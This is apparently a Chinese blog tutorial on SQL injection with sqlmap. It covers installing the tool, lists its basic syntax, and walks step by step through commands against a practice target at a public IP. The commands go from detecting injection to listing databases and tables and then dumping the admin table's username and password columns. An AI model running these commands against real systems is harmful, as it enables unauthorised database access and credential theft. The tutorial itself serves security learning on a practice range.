【Mac渗透测试】之SQL注入Demo
目录:
一、下载安装sqlmap
1、官网地址:http://sqlmap.org/#download
git下载:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
2、验证sqlmap安装成功:
sqlmap.py -v
二、SQL注入
1、首先网上找到了SQL 注入靶场:http://59.63.200.79:8003/?id=1
# 基础语法 sqlmap.py -u “注入地址” --dbs # 列举数据库 sqlmap.py -u “注入地址” --current--db # 当前数据库 sqlmap.py -u “注入地址” --users # 列数据库用户 sqlmap.py -u “注入地址” --current--user # 当前用户 sqlmap.py -u “注入地址” --tables -D “数据库” # 列举数据库的表名 sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” # 获取表的列名 sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” # 获取数据库下表的列信息
2、查看是否可以SQL注入:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch
3、查看数据库:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs
4、查看当前使用的数据库:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --current-db
5、查看当前数据库的表:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables
6、查看admin表的sql字段列:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns
7、查看maoshe数据库、admin表的“password,username”字段的值:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --dump -C "password,username" -T admin -D maoshe
三、参考文章 返回目录
1、感谢海龙。 的文章《SQLMap的安装与使用》*****
2、感谢Agan '的文章《SQL注入篇:SQL 注入靶场练习【实例1】》*****
3、感谢simeon的文章《超详细SQLMap使用攻略及技巧分享 》****
4、感谢ISNS的文章《零基础学习手工SQL注入(墨者学院靶场)》
5、感谢迷途行者 的文章《第一次靶场练习:SQL注入(1)》
不积跬步,无以致千里;不集小流,无以成江海。
如转载本文,请还多关注一下我的博客:https://www.cnblogs.com/Owen-ET/;
我的Github地址:https://github.com/Owen-ET————————————
无善无恶心之体, 有善有恶意之动, 知善知恶是良知, 为善去恶是格物。